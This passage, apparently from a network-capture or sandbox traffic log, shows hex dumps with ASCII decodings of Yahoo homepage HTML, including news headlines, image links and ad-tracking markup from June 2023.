23 78 32 37 3b 20 72 65 6c 61 74 69 76 65 20 6f 77 6e 73 20 73 74 6f 63 6b
                                                                                                                                                                        Data Ascii: -1b57-3a2f-9344-9c9370740af2;grpt:storyCluster;pkgt:cluster_all_img;pos:1;cnt_tpc:U.S.;slk:The judge assigned to hear Disney&#x27;s lawsuit against Ron DeSantis just disqualified himself from the case because a &#x27;third-degree&#x27; relative owns stock
                                                                                                                                                                        2023-06-02 11:13:21 UTC682INData Raw: 62 35 37 2d 33 61 32 66 2d 39 33 34 34 2d 39 63 39 33 37 30 37 34 30 61 66 32 22 20 64 61 74 61 2d 74 79 70 65 3d 22 31 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 31 34 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 32 36 22 20 64 61 74 61 2d 79 63 74 73 3d 22 30 30 31 30 30 30 31 36 36 2c 30 30 31 30 30 30 36 36 31 22 20 64 61 74 61 2d 77 69 6b 69 73 3d 22 54 68 65 5f 57 61 6c 74 5f 44 69 73 6e 65 79 5f 43 6f 6d 70 61 6e 79 2c 52 6f 6e 5f 44 65 53 61 6e 74 69 73 2c 57 61 6c 74 5f 44 69 73 6e 65 79 2c 57 61 6c 74 5f 44 69 73 6e 65 79 5f 57 6f 72 6c 64 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 63 6c 75 73 74 65 72 2d 69 74 65 6d 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61
                                                                                                                                                                        Data Ascii: b57-3a2f-9344-9c9370740af2" data-type="1" data-cpos="14" data-cposy="26" data-ycts="001000166,001000661" data-wikis="The_Walt_Disney_Company,Ron_DeSantis,Walt_Disney,Walt_Disney_World" data-test-locator="stream-cluster-item"><a class="js-content-viewer ra
                                                                                                                                                                        2023-06-02 11:13:21 UTC684INData Raw: 30 22 3e 46 65 64 65 72 61 6c 20 6a 75 64 67 65 20 64 69 73 71 75 61 6c 69 66 69 65 73 20 68 69 6d 73 65 6c 66 20 66 72 6f 6d 20 68 65 61 72 69 6e 67 20 44 69 73 6e 65 79 20 6c 61 77 73 75 69 74 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 43 28 24 73 74 72 65 61 6d 49 74 65 6d 47 72 61 79 29 20 46 7a 28 31 31 70 78 29 20 4d 74 28 32 70 78 29 20 56 61 28 62 29 20 44 28 69 62 29 2d 2d 6d 64 31 31 36 30 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 63 6c 75 73 74 65 72 2d 70 75 62 22 3e 52 65 75 74 65 72 73 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 63 6c 75 73 74 65 72 2d 69 74 65 6d 20 46 6c 28 73 74 61 72 74 29 20 57 28 35 30 25 29 20 57 28 31 30 30 25
                                                                                                                                                                        Data Ascii: 0">Federal judge disqualifies himself from hearing Disney lawsuit</div><div class="C($streamItemGray) Fz(11px) Mt(2px) Va(b) D(ib)--md1160" data-test-locator="stream-cluster-pub">Reuters</div></a></li><li class="stream-cluster-item Fl(start) W(50%) W(100%
                                                                                                                                                                        2023-06-02 11:13:21 UTC685INData Raw: 69 77 28 36 35 70 78 29 20 4d 61 77 28 37 32 70 78 29 20 4d 65 6e 64 28 31 30 70 78 29 20 54 72 73 64 75 28 30 73 29 21 20 44 28 6e 29 2d 2d 6d 64 31 31 36 30 20 42 64 72 73 28 32 70 78 29 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 75 75 2f 61 70 69 2f 72 65 73 2f 31 2e 32 2f 45 74 51 77 73 38 56 38 67 55 57 69 37 4c 70 30 75 36 72 34 76 67 2d 2d 7e 42 2f 5a 6d 6b 39 63 33 52 79 61 57 30 37 61 44 30 78 4e 44 41 37 63 54 30 35 4d 44 74 33 50 54 45 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 74 68 65 5f 68 6f 6c 6c 79 77 6f 6f 64 5f 72 65 70 6f 72 74 65 72 5f 32 31 37 2f 64 62 34 37 65 62 35 39 38 35 64 38 35
                                                                                                                                                                        Data Ascii: iw(65px) Maw(72px) Mend(10px) Trsdu(0s)! D(n)--md1160 Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/EtQws8V8gUWi7Lp0u6r4vg--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_hollywood_reporter_217/db47eb5985d85
                                                                                                                                                                        2023-06-02 11:13:21 UTC686INData Raw: 3b 69 6e 74 6c 46 75 6a 69 55 69 43 6f 6e 66 69 67 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 72 6f 75 6e 64 65 64 43 6f 72 6e 65 72 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 75 73 65 56 65 72 74 69 63 61 6c 43 6f 6e 74 72 6f 6c 49 63 6f 6e 73 26 71 75 6f 74 3b 3a 66 61 6c 73 65 7d 2c 26 71 75 6f 74 3b 78 68 72 50 61 74 68 50 72 65 66 69 78 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6e 63 70 50 61 72 61 6d 73 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 71 75 65 72 79 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 70 61 67 65 43 6f 6e 74 65 78 74 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 75 26 71 75 6f 74 3b 3a 30 2c 26 71 75 6f 74 3b 70 61 67 65 54 79 70 65
                                                                                                                                                                        Data Ascii: ;intlFujiUiConfig&quot;:{&quot;roundedCorner&quot;:false,&quot;useVerticalControlIcons&quot;:false},&quot;xhrPathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;,&quot;ncpParams&quot;:{&quot;query&quot;:{&quot;pageContext&quot;:{&quot;lu&quot;:0,&quot;pageType
                                                                                                                                                                        2023-06-02 11:13:21 UTC688INData Raw: 74 65 6d 22 20 64 61 74 61 2d 79 61 66 74 2d 6d 6f 64 75 6c 65 3d 22 73 74 72 65 61 6d 5f 69 74 65 6d 5f 31 35 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4d 69 68 28 31 34 30 70 78 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 79 28 31 32 70 78 29 20 50 6f 73 28 72 29 20 43 66 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 6c 28 73 74 61 72 74 29 20 50 6f 73 28 72 29 20 4d 65 6e 64 28 32 35 70 78 29 20 4d 61 77 28 32 32 30 70 78 29 20 57 28 32 36 25 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 28 30 29 20 54 28 30 70 78 29 20 42 64 72 73 28 32 70 78 29 20 53 74 61 72 74 28 30 29 20 50 6f 73 28 72 29 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 38 37 2e 37 33 25 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73
                                                                                                                                                                        Data Ascii: tem" data-yaft-module="stream_item_15"><div class="Mih(140px)"><div class="Py(12px) Pos(r) Cf"><div class="Fl(start) Pos(r) Mend(25px) Maw(220px) W(26%)"><div class="H(0) T(0px) Bdrs(2px) Start(0) Pos(r)" style="padding-bottom:87.73%" data-test-locator="s
                                                                                                                                                                        2023-06-02 11:13:21 UTC689INData Raw: 20 46 7a 28 31 32 70 78 29 20 44 28 69 62 29 20 4d 62 28 34 70 78 29 20 4c 68 28 31 29 22 20 69 64 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 70 75 62 6c 69 73 68 65 72 5f 31 35 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 70 75 62 6c 69 73 68 65 72 22 3e 50 72 65 76 65 6e 74 69 6f 6e 3c 2f 64 69 76 3e 3c 68 33 20 63 6c 61 73 73 3d 22 4c 69 6e 65 43 6c 61 6d 70 28 32 2c 32 2e 36 65 6d 29 20 4d 62 28 34 70 78 29 20 4d 62 28 30 29 2d 2d 6d 64 31 31 36 30 20 4d 74 28 30 29 20 4c 68 28 31 2e 33 29 20 46 7a 28 31 39 70 78 29 20 73 74 72 65 61 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 3c 61 20 63
                                                                                                                                                                        Data Ascii: Fz(12px) D(ib) Mb(4px) Lh(1)" id="stream-item-publisher_15" data-test-locator="stream-item-publisher">Prevention</div><h3 class="LineClamp(2,2.6em) Mb(4px) Mb(0)--md1160 Mt(0) Lh(1.3) Fz(19px) stream-item-title" data-test-locator="stream-item-title"><a c
                                                                                                                                                                        2023-06-02 11:13:21 UTC690INData Raw: 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 73 75 6d 6d 61 72 79 22 3e 4c 69 73 61 20 52 69 6e 6e 61 20 70 6f 73 65 64 20 74 6f 70 6c 65 73 73 20 77 69 74 68 20 65 78 74 72 61 2d 6c 6f 6e 67 20 68 61 69 72 20 66 6f 72 20 61 20 6e 65 77 20 70 68 6f 74 6f 73 68 6f 6f 74 2e 20 46 61 6e 73 20 68 61 76 65 20 74 68 6f 75 67 68 74 73 20 61 62 6f 75 74 20 74 68 65 20 66 6f 72 6d 65 72 20 e2 80 9c 52 65 61 6c 20 48 6f 75 73 65 77 69 76 65 73 20 6f 66 20 42 65 76 65 72 6c 79 20 48 69 6c 6c 73 e2 80 9d 20 73 74 61 72 e2 80 99 73 20 6e 65 77 20 76 65 6e 74 75 72 65 73 2e 3c 2f 70 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 4c 69 73 74 28 6e 29 20 4d 74 28 31 32 70 78 29 20 46 7a 28 31 32 70 78 29 20 50 6f 73 28 72 29 20 50 28 30 29 22 3e 3c
                                                                                                                                                                        Data Ascii: test-locator="stream-item-summary">Lisa Rinna posed topless with extra-long hair for a new photoshoot. Fans have thoughts about the former Real Housewives of Beverly Hills stars new ventures.</p><ul class="List(n) Mt(12px) Fz(12px) Pos(r) P(0)"><
                                                                                                                                                                        2023-06-02 11:13:21 UTC691INData Raw: 46 6c 28 73 74 61 72 74 29 20 57 28 32 39 25 29 20 4d 69 77 28 36 35 70 78 29 20 4d 61 77 28 37 32 70 78 29 20 4d 65 6e 64 28 31 30 70 78 29 20 54 72 73 64 75 28 30 73 29 21 20 44 28 6e 29 2d 2d 6d 64 31 31 36 30 20 42 64 72 73 28 32 70 78 29 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 75 75 2f 61 70 69 2f 72 65 73 2f 31 2e 32 2f 6f 32 70 63 68 4f 4c 71 42 7a 50 7a 4d 56 33 4f 47 49 30 4d 54 51 2d 2d 7e 42 2f 5a 6d 6b 39 63 33 52 79 61 57 30 37 61 44 30 78 4e 44 41 37 63 54 30 35 4d 44 74 33 50 54 45 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 75 73 5f 6d 61 67 61 7a 69 6e 65 5f 38 39 36 2f 38 35 31 32 30 38
                                                                                                                                                                        Data Ascii: Fl(start) W(29%) Miw(65px) Maw(72px) Mend(10px) Trsdu(0s)! D(n)--md1160 Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/o2pchOLqBzPzMV3OGI0MTQ--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/us_magazine_896/851208
                                                                                                                                                                        2023-06-02 11:13:21 UTC693INData Raw: 39 35 61 65 2d 33 38 62 35 2d 61 32 63 61 2d 36 35 64 31 62 65 38 36 34 38 32 37 3b 67 72 70 74 3a 73 74 6f 72 79 43 6c 75 73 74 65 72 3b 70 6b 67 74 3a 63 6c 75 73 74 65 72 5f 61 6c 6c 5f 69 6d 67 3b 70 6f 73 3a 33 3b 73 6c 6b 3a 4c 69 73 61 20 52 69 6e 6e 61 20 73 61 79 73 20 74 68 69 73 20 64 69 73 61 70 70 6f 69 6e 74 69 6e 67 20 6d 6f 6d 65 6e 74 20 69 73 20 77 68 61 74 20 69 6e 73 70 69 72 65 64 20 68 65 72 20 74 6f 20 67 65 74 20 68 65 72 20 73 69 67 6e 61 74 75 72 65 20 68 61 69 72 63 75 74 3b 22 20 68 72 65 66 3d 22 2f 6c 69 66 65 73 74 79 6c 65 2f 6c 69 73 61 2d 72 69 6e 6e 61 2d 73 61 79 73 2d 64 69 73 61 70 70 6f 69 6e 74 69 6e 67 2d 6d 6f 6d 65 6e 74 2d 30 39 35 32 34 36 31 30 34 2e 68 74 6d 6c 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 70
                                                                                                                                                                        Data Ascii: 95ae-38b5-a2ca-65d1be864827;grpt:storyCluster;pkgt:cluster_all_img;pos:3;slk:Lisa Rinna says this disappointing moment is what inspired her to get her signature haircut;" href="/lifestyle/lisa-rinna-says-disappointing-moment-095246104.html" data-wf-caas-p
                                                                                                                                                                        2023-06-02 11:13:21 UTC694INData Raw: 75 6d 3d 72 65 66 65 72 72 61 6c 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 61 64 2d 66 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 70 6f 6e 73 6f 72 65 64 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 6c 65 67 61 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 75 73 2f 65 6e 2f 79 61 68 6f 6f 2f 70 72 69 76 61 63 79 2f 61 64 69 6e 66 6f 2f 69 6e 64 65 78 2e 68 74 6d 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 44 72 61 77 65 72 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 41 64 4c 69 74 65 55 70 53 65 6c 6c 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 74 72 75 65 7d 2c 26 71 75 6f 74 3b 66 65 61 74 75 72 65 73 26 71 75 6f 74 3b 3a 7b 7d 2c 26
                                                                                                                                                                        Data Ascii: um=referral&amp;utm_campaign=ad-feedback&quot;,&quot;sponsoredUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableDrawerFeedback&quot;:false,&quot;enableAdLiteUpSellFeedback&quot;:true},&quot;features&quot;:{},&
                                                                                                                                                                        2023-06-02 11:13:21 UTC695INData Raw: 20 64 61 74 61 2d 75 75 69 64 3d 22 35 61 63 31 35 39 31 66 2d 37 37 39 66 2d 33 65 38 30 2d 38 63 38 65 2d 32 62 38 65 35 30 36 61 63 62 65 33 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 31 36 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 33 31 22 20 64 61 74 61 2d 79 63 74 73 3d 22 30 30 31 30 30 30 36 36 37 2c 30 30 31 30 30 30 37 38 30 22 20 64 61 74 61 2d 70 72 6f 70 65 72 74 79 3d 22 55 2e 53 2e 22 20 64 61 74 61 2d 68 61 73 2d 63 6c 75 73 74 65 72 3d 22 74 72 75 65 22 20 64 61 74 61 2d 69 31 33 6e 2d 63 66 67 3d 22 7b 26 71 75 6f 74 3b 62 70 6f 73 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 4c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 2e 53 2e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 63 70 6f 73 26 71 75 6f 74 3b 3a 31 36
                                                                                                                                                                        Data Ascii: data-uuid="5ac1591f-779f-3e80-8c8e-2b8e506acbe3" data-cpos="16" data-cposy="31" data-ycts="001000667,001000780" data-property="U.S." data-has-cluster="true" data-i13n-cfg="{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;U.S.&quot;,&quot;cpos&quot;:16
                                                                                                                                                                        2023-06-02 11:13:21 UTC696INData Raw: 6f 73 74 5f 35 38 34 2f 31 61 61 30 65 38 65 64 61 63 35 33 36 36 39 33 61 61 32 62 38 62 37 30 39 36 31 32 36 64 61 66 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d 22 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 69 6d 61 67 65 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 65 6e 64 28 34 35 70 78 29 20 4f 76 28 68 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 7a 28 31 36 70 78 29 20 46 77 28 62 29 20 54 74 28 63 29 20 44 28 69 62 29 20 4d 62 28 34 70 78 29 20 4d 65 6e 64 28 39 70 78 29 20 4c 68 28 31 29 20 43 28 24 63 61 74 2d 75 73 29 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 63 61 74 65 67 6f 72
                                                                                                                                                                        Data Ascii: ost_584/1aa0e8edac536693aa2b8b7096126daf.cf.jpg" alt="" data-test-locator="stream-item-image"/></a></div> </div><div class="Pend(45px) Ov(h)"><div class="Fz(16px) Fw(b) Tt(c) D(ib) Mb(4px) Mend(9px) Lh(1) C($cat-us)" data-test-locator="stream-item-categor
                                                                                                                                                                        2023-06-02 11:13:21 UTC698INData Raw: 5f 31 36 22 3e 46 6c 6f 72 69 64 61 20 4d 61 6e 20 50 6f 69 6e 74 65 64 20 47 75 6e 20 41 74 20 57 6f 6d 61 6e 26 23 78 32 37 3b 73 20 48 65 61 64 20 41 66 74 65 72 20 48 65 72 20 46 72 69 65 6e 64 20 42 61 63 6b 65 64 20 49 6e 74 6f 20 48 69 73 20 44 72 69 76 65 77 61 79 3a 20 53 68 65 72 69 66 66 3c 2f 73 70 61 6e 3e 3c 75 20 63 6c 61 73 73 3d 22 53 74 72 65 74 63 68 65 64 42 6f 78 22 3e 3c 2f 75 3e 3c 2f 61 3e 3c 2f 68 33 3e 3c 70 20 63 6c 61 73 73 3d 22 44 28 6e 29 2d 2d 6d 64 31 31 36 30 20 4c 69 6e 65 43 6c 61 6d 70 28 32 2c 33 38 70 78 29 20 66 69 6e 61 6e 63 65 2d 74 69 63 6b 65 72 2d 66 65 74 63 68 2d 73 75 63 63 65 73 73 5f 44 28 6e 29 20 73 75 62 2d 75 70 73 65 6c 6c 2d 66 65 74 63 68 2d 73 75 63 63 65 73 73 5f 44 28 6e 29 20 46 7a 28 31 34 70
                                                                                                                                                                        Data Ascii: _16">Florida Man Pointed Gun At Woman&#x27;s Head After Her Friend Backed Into His Driveway: Sheriff</span><u class="StretchedBox"></u></a></h3><p class="D(n)--md1160 LineClamp(2,38px) finance-ticker-fetch-success_D(n) sub-upsell-fetch-success_D(n) Fz(14p
                                                                                                                                                                        2023-06-02 11:13:21 UTC699INData Raw: 64 20 62 61 63 6b 65 64 20 69 6e 74 6f 20 68 69 73 20 64 72 69 76 65 77 61 79 2c 20 73 68 65 72 69 66 66 26 23 78 32 37 3b 73 20 6f 66 66 69 63 65 20 73 61 79 73 3b 22 20 68 72 65 66 3d 22 2f 6e 65 77 73 2f 66 6c 6f 72 69 64 61 2d 6d 61 6e 2d 70 6f 69 6e 74 65 64 2d 67 75 6e 2d 77 6f 6d 61 6e 2d 30 31 33 36 35 34 38 37 30 2e 68 74 6d 6c 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 70 72 65 66 65 74 63 68 3d 22 31 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 75 75 69 64 3d 22 37 30 32 39 39 65 39 66 2d 33 65 63 31 2d 33 64 63 35 2d 39 63 30 39 2d 34 30 35 66 30 38 34 65 64 65 66 62 22 20 64 61 74 61 2d 68 6f 73 74 65 64 2d 74 79 70 65 3d 22 48 4f 53 54 45 44 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 46 6c 28 73 74 61 72 74 29 20 57 28 32 39 25 29 20 4d 69
                                                                                                                                                                        Data Ascii: d backed into his driveway, sheriff&#x27;s office says;" href="/news/florida-man-pointed-gun-woman-013654870.html" data-wf-caas-prefetch="1" data-wf-caas-uuid="70299e9f-3ec1-3dc5-9c09-405f084edefb" data-hosted-type="HOSTED"><img class="Fl(start) W(29%) Mi
                                                                                                                                                                        2023-06-02 11:13:21 UTC700INData Raw: 63 3a 30 3b 65 6c 6d 3a 62 74 6e 3b 73 75 62 73 65 63 3a 73 74 72 6d 70 75 62 73 75 62 3b 63 63 6f 64 65 3a 73 74 72 6d 70 75 62 73 75 62 3b 62 70 6f 73 3a 31 3b 63 70 6f 73 3a 31 36 3b 63 70 6f 73 79 3a 33 33 3b 72 73 70 6e 73 3a 6e 61 76 3b 74 31 3a 61 33 3b 74 32 3a 73 74 72 6d 3b 74 33 3a 63 74 3b 70 6f 73 3a 33 3b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 64 64 6d 2f 74 72 61 63 6b 63 6c 6b 2f 4e 33 36 30 38 30 31 2e 31 39 31 33 33 35 35 59 41 48 4f 4f 41 44 4d 41 4e 41 47 45 52 2f 42 32 33 36 34 34 35 36 34 2e 32 37 33 39 32 34 31 31 32 3b 64 63 5f 74 72 6b 5f 61 69 64 3d 34 36 38 33 30 35 33 37 33 3b 64 63 5f 74 72 6b 5f 63 69 64 3d 31 32 37 31 37 32 39 39 33 3b 64 63 5f 6c 61 74 3d 3b
                                                                                                                                                                        Data Ascii: c:0;elm:btn;subsec:strmpubsub;ccode:strmpubsub;bpos:1;cpos:16;cposy:33;rspns:nav;t1:a3;t2:strm;t3:ct;pos:3;" href="https://ad.doubleclick.net/ddm/trackclk/N360801.1913355YAHOOADMANAGER/B23644564.273924112;dc_trk_aid=468305373;dc_trk_cid=127172993;dc_lat=;
                                                                                                                                                                        2023-06-02 11:13:21 UTC702INData Raw: 64 2d 66 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 70 6f 6e 73 6f 72 65 64 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 6c 65 67 61 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 75 73 2f 65 6e 2f 79 61 68 6f 6f 2f 70 72 69 76 61 63 79 2f 61 64 69 6e 66 6f 2f 69 6e 64 65 78 2e 68 74 6d 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 44 72 61 77 65 72 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 41 64 4c 69 74 65 55 70 53 65 6c 6c 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 74 72 75 65 7d 2c 26 71 75 6f 74 3b 66 65 61 74 75 72 65 73 26 71 75 6f 74 3b 3a 7b 7d 2c 26 71 75 6f 74 3b 69 31 33 6e 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 62 70 6f 73 26 71 75
                                                                                                                                                                        Data Ascii: d-feedback&quot;,&quot;sponsoredUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableDrawerFeedback&quot;:false,&quot;enableAdLiteUpSellFeedback&quot;:true},&quot;features&quot;:{},&quot;i13n&quot;:{&quot;bpos&qu
                                                                                                                                                                        2023-06-02 11:13:21 UTC703INData Raw: 2d 63 64 62 64 30 63 35 37 31 39 36 30 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 31 37 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 33 34 22 20 64 61 74 61 2d 79 63 74 73 3d 22 30 30 31 30 30 30 30 36 39 2c 30 30 31 30 30 30 30 33 31 22 20 64 61 74 61 2d 77 69 6b 69 73 3d 22 50 65 74 65 5f 44 61 76 69 64 73 6f 6e 2c 43 68 61 73 65 5f 53 75 69 5f 57 6f 6e 64 65 72 73 2c 4b 69 6d 5f 4b 61 72 64 61 73 68 69 61 6e 22 20 64 61 74 61 2d 70 72 6f 70 65 72 74 79 3d 22 43 65 6c 65 62 72 69 74 79 22 20 64 61 74 61 2d 68 61 73 2d 63 6c 75 73 74 65 72 3d 22 74 72 75 65 22 20 64 61 74 61 2d 69 31 33 6e 2d 63 66 67 3d 22 7b 26 71 75 6f 74 3b 62 70 6f 73 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 4c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b
                                                                                                                                                                        Data Ascii: -cdbd0c571960" data-cpos="17" data-cposy="34" data-ycts="001000069,001000031" data-wikis="Pete_Davidson,Chase_Sui_Wonders,Kim_Kardashian" data-property="Celebrity" data-has-cluster="true" data-i13n-cfg="{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;
                                                                                                                                                                        2023-06-02 11:13:21 UTC704INData Raw: 34 4d 44 74 33 50 54 51 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 63 69 6e 65 6d 61 62 6c 65 6e 64 5f 33 38 38 2f 31 37 33 62 61 33 31 62 32 63 31 62 35 64 36 33 33 63 31 31 61 37 36 31 32 39 66 61 66 30 33 34 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d 22 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 69 6d 61 67 65 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 65 6e 64 28 34 35 70 78 29 20 4f 76 28 68 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 7a 28 31 36 70 78 29 20 46 77 28 62 29 20 54 74 28 63 29 20 44 28 69 62 29 20 4d 62 28 34 70
                                                                                                                                                                        Data Ascii: 4MDt3PTQ0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/cinemablend_388/173ba31b2c1b5d633c11a76129faf034.cf.jpg" alt="" data-test-locator="stream-item-image"/></a></div> </div><div class="Pend(45px) Ov(h)"><div class="Fz(16px) Fw(b) Tt(c) D(ib) Mb(4p
                                                                                                                                                                        2023-06-02 11:13:21 UTC705INData Raw: 63 61 61 73 2d 70 72 65 66 65 74 63 68 3d 22 31 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 75 75 69 64 3d 22 36 66 33 37 66 38 36 33 2d 33 36 64 32 2d 33 34 35 63 2d 39 30 66 62 2d 63 64 62 64 30 63 35 37 31 39 36 30 22 20 64 61 74 61 2d 73 74 6f 72 79 2d 6c 61 62 65 6c 3d 22 43 65 6c 65 62 72 69 74 79 22 3e 3c 73 70 61 6e 20 69 64 3d 22 73 74 72 65 61 6d 5f 69 74 65 6d 5f 74 69 74 6c 65 5f 31 37 22 3e 50 65 74 65 20 44 61 76 69 64 73 6f 6e 20 41 6e 64 20 43 68 61 73 65 20 53 75 69 20 57 6f 6e 64 65 72 73 20 48 61 76 65 20 52 65 61 63 68 65 64 20 54 68 65 20 50 6f 69 6e 74 20 49 6e 20 54 68 65 69 72 20 52 65 6c 61 74 69 6f 6e 73 68 69 70 20 57 68 65 72 65 20 54 68 65 79 26 23 78 32 37 3b 72 65 20 47 65 74 74 69 6e 67 20 41 20 44 6f 67 20 54 6f 67 65 74
                                                                                                                                                                        Data Ascii: caas-prefetch="1" data-wf-caas-uuid="6f37f863-36d2-345c-90fb-cdbd0c571960" data-story-label="Celebrity"><span id="stream_item_title_17">Pete Davidson And Chase Sui Wonders Have Reached The Point In Their Relationship Where They&#x27;re Getting A Dog Toget
